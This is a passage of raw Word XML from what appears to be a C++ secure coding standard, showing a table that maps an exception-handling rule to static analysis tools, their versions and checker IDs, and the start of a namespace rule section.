          <w:p w14:paraId="5F7399E4" w14:textId="33A5D96C" w:rsidR="00310BC6" w:rsidRDefault="00000000" w:rsidP="00310BC6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId102" w:history="1">
              <w:r w:rsidR="00310BC6">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Astrée</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70E3BAB5" w14:textId="250022E2" w:rsidR="00310BC6" w:rsidRDefault="00310BC6" w:rsidP="00310BC6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>22.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B7EADC2" w14:textId="6D406AF7" w:rsidR="00310BC6" w:rsidRDefault="00310BC6" w:rsidP="00310BC6">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75DCDCFD" w14:textId="503C2644" w:rsidR="00310BC6" w:rsidRDefault="00310BC6" w:rsidP="00310BC6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Partially checked</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00310BC6" w14:paraId="5A6D683D" w14:textId="77777777" w:rsidTr="00D6729C">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4934DBDE" w14:textId="20DF2BAD" w:rsidR="00310BC6" w:rsidRDefault="00000000" w:rsidP="00310BC6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId103" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidR="00310BC6">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Axivion</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
              <w:r w:rsidR="00310BC6">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve"> Bauhaus Suite</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BE3A805" w14:textId="5E73DB4F" w:rsidR="00310BC6" w:rsidRDefault="00310BC6" w:rsidP="00310BC6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>7.2.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37B18F86" w14:textId="36C7E14F" w:rsidR="00310BC6" w:rsidRDefault="00310BC6" w:rsidP="00310BC6">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31DBDB00" w14:textId="2D1B73E9" w:rsidR="00310BC6" w:rsidRDefault="00310BC6" w:rsidP="00310BC6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00310BC6" w14:paraId="0393D0E0" w14:textId="77777777" w:rsidTr="00D6729C">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3244D2D0" w14:textId="099398EF" w:rsidR="00310BC6" w:rsidRDefault="00000000" w:rsidP="00310BC6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId104" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidR="00310BC6">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>CodeSonar</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1558498F" w14:textId="1672C4BB" w:rsidR="00310BC6" w:rsidRDefault="00310BC6" w:rsidP="00310BC6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>8.1p0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="770ABE2D" w14:textId="1B16A7DB" w:rsidR="00310BC6" w:rsidRDefault="00310BC6" w:rsidP="00310BC6">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>LANG.STRUCT.UCTCH</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="722EAC45" w14:textId="52896507" w:rsidR="00310BC6" w:rsidRDefault="00310BC6" w:rsidP="00310BC6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Unreachable Catch</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00310BC6" w14:paraId="541E921E" w14:textId="77777777" w:rsidTr="00D6729C">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58C0D3F3" w14:textId="19D9C3F6" w:rsidR="00310BC6" w:rsidRDefault="00000000" w:rsidP="00310BC6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId105" w:history="1">
              <w:r w:rsidR="00310BC6">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Helix QAC</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7890026A" w14:textId="6A146660" w:rsidR="00310BC6" w:rsidRDefault="00310BC6" w:rsidP="00310BC6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>2024.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47B9A75A" w14:textId="7332D58B" w:rsidR="00310BC6" w:rsidRDefault="00310BC6" w:rsidP="00310BC6">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>C++4035, C++4036, C++4037</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3855F180" w14:textId="00373C99" w:rsidR="00310BC6" w:rsidRDefault="00310BC6" w:rsidP="00310BC6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00310BC6" w14:paraId="321C9FA9" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="224CDD93" w14:textId="621C59E0" w:rsidR="00310BC6" w:rsidRDefault="00000000" w:rsidP="00310BC6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId106" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidR="00310BC6">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Klocwork</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79DD072C" w14:textId="74B0CB3A" w:rsidR="00310BC6" w:rsidRDefault="00310BC6" w:rsidP="00310BC6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>2024.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F691AB9" w14:textId="3D716B07" w:rsidR="00310BC6" w:rsidRDefault="00310BC6" w:rsidP="00310BC6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>MISRA.CATCH.ALL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E32E8DF" w14:textId="77777777" w:rsidR="00310BC6" w:rsidRDefault="00310BC6" w:rsidP="00310BC6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00310BC6" w14:paraId="5BBDD4A8" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FBCAECC" w14:textId="4EC54D5C" w:rsidR="00310BC6" w:rsidRDefault="00000000" w:rsidP="00310BC6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId107" w:history="1">
              <w:r w:rsidR="00310BC6">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>LDRA tool suite</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D2E8E38" w14:textId="77777777" w:rsidR="00310BC6" w:rsidRDefault="00310BC6" w:rsidP="00310BC6">
            <w:pPr>
              <w:divId w:val="1749838277"/>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>9.7.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="348AB2BC" w14:textId="5E12D9BA" w:rsidR="00310BC6" w:rsidRDefault="00310BC6" w:rsidP="00310BC6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47F79C0E" w14:textId="3721ECFC" w:rsidR="00310BC6" w:rsidRDefault="00310BC6" w:rsidP="00310BC6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>527 S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="012AA30D" w14:textId="6574E19F" w:rsidR="00310BC6" w:rsidRDefault="00310BC6" w:rsidP="00310BC6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Partially implemented</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00310BC6" w14:paraId="415234C8" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C940DF2" w14:textId="3F1CB88B" w:rsidR="00310BC6" w:rsidRDefault="00000000" w:rsidP="00310BC6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId108" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidR="00310BC6">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Parasoft</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
              <w:r w:rsidR="00310BC6">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve"> C/C++test</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76E7C4D8" w14:textId="7EE7AA69" w:rsidR="00310BC6" w:rsidRDefault="00310BC6" w:rsidP="00310BC6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>2023.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34777AB2" w14:textId="3C1ADF98" w:rsidR="00310BC6" w:rsidRDefault="00310BC6" w:rsidP="00310BC6">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rP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66AACB9D" w14:textId="2A6EBBF1" w:rsidR="00310BC6" w:rsidRDefault="00310BC6" w:rsidP="00310BC6">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310BC6" w14:paraId="177EE248" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09BFA1F8" w14:textId="52E64629" w:rsidR="00310BC6" w:rsidRDefault="00000000" w:rsidP="00310BC6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId109" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidR="00310BC6">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Polyspace</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
              <w:r w:rsidR="00310BC6">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve"> Bug Finder</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17B55B3F" w14:textId="1549B974" w:rsidR="00310BC6" w:rsidRDefault="00310BC6" w:rsidP="00310BC6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>R2024a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="237A438D" w14:textId="1ADD7C16" w:rsidR="00310BC6" w:rsidRDefault="00000000" w:rsidP="00310BC6">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId110" w:history="1">
              <w:r w:rsidR="00310BC6">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>CERT C++: ERR51-CPP</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="247E2C86" w14:textId="71C1BAAD" w:rsidR="00310BC6" w:rsidRDefault="00310BC6" w:rsidP="00310BC6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Checks for unhandled exceptions (rule partially covered)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00310BC6" w14:paraId="4FD06851" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79BB9036" w14:textId="593BD098" w:rsidR="00310BC6" w:rsidRDefault="00000000" w:rsidP="00310BC6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId111" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidR="00310BC6">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>RuleChecker</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B986054" w14:textId="2B52A844" w:rsidR="00310BC6" w:rsidRDefault="00310BC6" w:rsidP="00310BC6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>22.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FB441F9" w14:textId="3EF5DB29" w:rsidR="00310BC6" w:rsidRDefault="00310BC6" w:rsidP="00310BC6">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>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11539D90" w14:textId="1A2A8F15" w:rsidR="00310BC6" w:rsidRDefault="00310BC6" w:rsidP="00310BC6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>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4" w:name="_Toc52464066"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Coding Standard 8</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="3E74FF37"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rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>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E288828" w:rsidR="00B475A1" w:rsidRPr="00C64B19" w:rsidRDefault="00834236" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C64B19">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Namespace</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5C9484A9" w14:textId="1E0BF8DE" w:rsidR="00B475A1" w:rsidRDefault="006A0F46" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>D</w:t>
            </w:r>
            <w:r w:rsidR="002C77D1">
              <w:t>CL</w:t>
            </w:r>
            <w:r w:rsidR="00B475A1">
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="002C77D1">
              <w:t>058</w:t>
            </w:r>
            <w:r w:rsidR="00B475A1">
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="002C77D1">
              <w:t>CPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7632" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
